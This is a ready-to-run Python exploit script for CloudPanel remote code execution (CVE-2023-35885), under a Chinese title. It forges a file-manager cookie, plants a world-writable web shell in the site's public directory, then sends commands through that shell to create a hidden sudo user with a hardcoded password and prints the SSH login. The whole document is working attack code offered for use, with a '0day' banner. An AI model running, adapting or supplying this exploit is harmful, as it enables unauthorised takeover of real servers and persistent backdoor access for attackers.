Cloudpanel 远程代码执行漏洞(CVE-2023-35885)

import subprocess, argparse import warnings ,os, sys import ctypes, platform, requests from colorama import Fore, Back, Style from datetime import date warnings.filterwarnings('ignore') cmd = '/usr/bin/php8.1 Crypto.php' default_path = '/file-manager/' parser = argparse.ArgumentParser() username = 'clp' tgt = '' #Use for automatically add new user with sudo privileges user_add = "useradd zeroday -s /bin/bash -b /tmp" user_passwd = "echo 'Etharus@1337%0AEtharus@1337' | passwd zeroday" user_mod = "usermod -aG sudo zeroday" gains = ["sudo su -c '"+user_add+"'",'sudo su -c "'+user_passwd+'"',"sudo su -c '"+user_mod+"'"] def execPHP(txt=False): global cmd returned_output = '' if False == txt: proc = subprocess.Popen(cmd.split(' '), stdout=subprocess.PIPE) returned_output = proc.stdout.read().decode('utf-8') else: cmd = cmd + ' ' + txt proc = subprocess.Popen(cmd.split(' '), stdout=subprocess.PIPE) returned_output = proc.stdout.read().decode('utf-8') return returned_output def exploit(): global tgt,default_path,username target = 'https://' + tgt.replace('/','') ipTarget = tgt.split(':')[0] crypto = execPHP() cookie = {'clp-fm':crypto} try: request = requests.get(target+default_path,cookies=cookie,verify=False,timeout=5) if request.status_code == 200: up_data = {'id':'/htdocs/app/files/public/','name':'shell.php'} new_ck = {'clp-fm':execPHP(username)} try: new_request = requests.post(target+default_path+'backend/makefile',cookies=new_ck,data=up_data,verify=False,timeout=5) if new_request.status_code == 200: cdata = {'id':'/htdocs/app/files/public/shell.php','content':open('shell.php','rb').read()} try: crequest = requests.post(target+default_path+'backend/text',cookies=new_ck,data=cdata,verify=False,timeout=5) if crequest.status_code == 200: pdata = {'id':'/htdocs/app/files/public/shell.php','permissions':'0777'} try: prequest = requests.post(target+default_path+'backend/permissions',cookies=new_ck,data=pdata,verify=False,timeout=5) if prequest.status_code == 200: shell_check = requests.get(target+'/shell.php',verify=False,timeout=5) if shell_check.status_code == 200: print(Style.BRIGHT + Fore.GREEN + '[+] WebShell : ' + target+'/shell.php') for gain in gains: requests.get(target+'/shell.php?cmd='+gain,verify=False,timeout=10) print(Style.BRIGHT + Fore.GREEN + '[+] SSH Login : user=zeroday,pass=Etharus@1337') except: print(Style.BRIGHT + Fore.RED+'Connection error while changing permission!') except: print(Style.BRIGHT + Fore.RED+'Connection error while trying insert contents!') except: print(Style.BRIGHT + Fore.RED+'Connection error while trying creating file!') else: print(Style.BRIGHT + Fore.RED+'Not Vulnerable...') except: print(Style.BRIGHT + Fore.RED+'Connection error!') def StartPage(): global tgt,prt parser.add_argument('-T','--target',dest='tgt',type=str, help='Ex: 127.0.0.1:8443',default=None, required=True) args = parser.parse_args() tgt = args.tgt exploit() if __name__ == '__main__': today = date.today() d2 = today.strftime("%B %d, %Y") if platform.system()=='Linux': os.system('clear') sys.stdout.write("\x1b]2;CLP 0Day {}\x07".format(d2)) else: os.system('cls') ctypes.windll.kernel32.SetConsoleTitleW(f'CLP 0Day | {d2}') print(f"""{Style.BRIGHT + Fore.GREEN} ______ _____ _____ __ _ / ____/___ _/ / (_)___ ____ _/ ___// /__(_)__ _____ / /_ / __ `/ / / / __ \/ __ `/\__ \/ //_/ / _ \/ ___/ / __/ / /_/ / / / / / / / /_/ /___/ / ,< / / __(__ ) /_/ \__,_/_/_/_/_/ /_/\__, //____/_/|_/_/\___/____/ /____/ CloudPanel 0day Version : 2.0.0 >= 2.3.0 {Style.BRIGHT + Fore.MAGENTA} ░█▀▄░█▀█░▀█▀░█▀█░█▀▀░█░█░░░░█▄█░█░█ ░█░█░█▀█░░█░░█▀█░█░░░█▀▄░░░░█░█░░█░ ░▀▀░░▀░▀░░▀░░▀░▀░▀▀▀░▀░▀░▀░░▀░▀░░▀░ {Style.BRIGHT + Fore.WHITE}""") StartPage()